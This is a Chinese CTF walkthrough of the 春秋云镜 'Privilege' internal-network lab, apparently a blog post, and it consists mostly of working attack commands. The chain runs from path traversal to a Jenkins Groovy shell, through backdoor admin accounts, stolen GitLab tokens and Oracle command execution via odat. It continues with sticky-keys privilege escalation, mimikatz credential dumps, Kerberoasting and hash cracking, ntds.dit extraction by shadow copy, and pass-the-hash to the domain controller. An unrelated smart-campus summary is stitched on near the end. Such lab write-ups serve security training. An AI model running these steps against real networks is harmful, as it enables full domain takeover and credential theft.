【内网渗透】最保姆级的春秋云镜Privilege打靶笔记

目录

flag1

flag2

flag3

flag4


flag1

fscan扫外网

访问./www.zip拿到源码

tools/content-log.php存在任意文件读取

 

根据提示读到Jenkins初始管理员密码

./tools/content-log.php?logfile=../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword

 

 admin/510235cf43f14e83b88a9f144199655b 登录8080端口Jenkins后台

groovy脚本命令执行,添加用户

println "net user Z3r4y 0x401@admin /add".execute().text
println "net localgroup administrators Z3r4y /add".execute().text

rdp连上去

读到flag1

 

flag2

上传fscan,frp,扫内网,搭代理

 

172.22.14.7 (XR-JENKINS)(已经拿下)

172.22.14.46 (XR-0923)

172.22.14.11 (XR-DC)

172.22.14.31 (XR-ORACLE)

172.22.14.16 (GitLab) 

 根据提示接下来打GitLab

 找到GitLab API Token

 

 

回到脚本控制台获取对应的明文,获得gitlab PRIVATE-TOKEN

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

GitLab信息泄露利用详见 

 项目 API | 极狐GitLab

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |jq  |grep "http_url_to_repo"

 git clone下来

proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git

 

在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账密

用odat打oracle

添加用户

proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user Z3r4y 0x401@admin /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators Z3r4y /add'

 rdp连上31

读到flag2

flag3

再打XR-0923

 

internal-secret/credentials.txt里找到XR-0923的账密

zhangshuai/wSbEajHzZs直接RDP连上46

权限很低,读不了flag,需要提权

 查看当前用户权限

net user zhangshuai

zhangshuai是Remote Management Use组的,可以打winrm

proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

 

whoami /priv

发现比RDP多了一个SeRestorePrivilege

奇安信攻防社区-手把手教你Windows提权

粘滞键提权

ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak
ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe

 回到rdp锁定用户,在登录处按5下shift触发粘滞键弹出cmd拿到SYSTEM

 读到flag3

flag4

 

 创建个管理员用户rdp上去

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

传个猕猴桃上去,以管理员权限运行导出哈希

privilege::debug
sekurlsa::logonpasswords

拿到XR-0923$的ntlm哈希

 

打kerberoasting

proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':a5ac13ae0abc9935a13e81c88f638494' -dc-ip 172.22.14.11

 抓tianjing的hash,写入hash.txt

 

hashcat -a 0 -m 13100 hash.txt rockyou.txt

hashcat爆出来tianjing密码是DPQSXSXgh2

 

winrm连一下 

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

whami /priv查看用户权限,发现又多一个SeBackupPrivilege

 谈谈域渗透中常见的可滥用权限及其应用场景(二)-腾讯云开发者社区-腾讯云

利用卷影拷贝服务提取ntds.dit - 先知社区 

kali上新建一个raj.dsh

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

 再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距

unix2dos raj.dsh

 在C:/下随便创个目录,上传raj.dsh

卷影拷贝

 

下载ntds.dit和system到kali上

RoboCopy /b z:\windows\ntds . ntds.dit
download ntds.dit
reg save HKLM\SYSTEM system
download system

 

 解密出administrator的hash

impacket-secretsdump -ntds ntds.dit -system system local

打pth,winrm上去 

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

读到flag4 

type /Users/Administrator/flag/flag04.txt

 

# 高校智慧校园解决方案摘要 智慧校园解决方案是针对高校信息化建设的核心工程,旨在通过物联网技术实现数字化校园的智能化升。该方案通过融合计算机技术、网络通信技术、数据库技术和IC卡识别技术,初步实现了校园一卡通系统,进而通过人脸识别技术实现了更精准的校园安全管理、生活管理、教务管理和资源管理。 方案包括多个管理系统:智慧校园管理平台、一卡通卡务管理系统、一卡通人脸库管理平台、智能人脸识别消费管理系统、疫情防控管理系统、人脸识别无感识别管理系统、会议签到管理系统、人脸识别通道管理系统和图书馆对接管理系统。这些系统共同构成了智慧校园的信息化基础,通过统一数据库和操作平台,实现了数据共享和信息一致性。 智能人脸识别消费管理系统通过人脸识别终端,在无需接触的情况下快速完成消费支付过程,提升了校园服务效率。疫情防控管理系统利用热成像测温技术、视频智能分析等手段,实现了对校园人员体温监测和疫情信息实时上报,提高了校园公共卫生事件的预防和控制能力。 会议签到管理系统和人脸识别通道管理系统均基于人脸识别技术,实现了会议的快速签到和图书馆等场所的高效通行管理。与图书馆对接管理系统实现了一卡通系统与图书馆管理系统的无缝集成,提升了图书借阅的便捷性。 总体而言,该智慧校园解决方案通过集成的信息化管理系统,提升了校园管理的智能化水平,优化了校园生活体验,增强了校园安全,并提高了教学和科研的效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值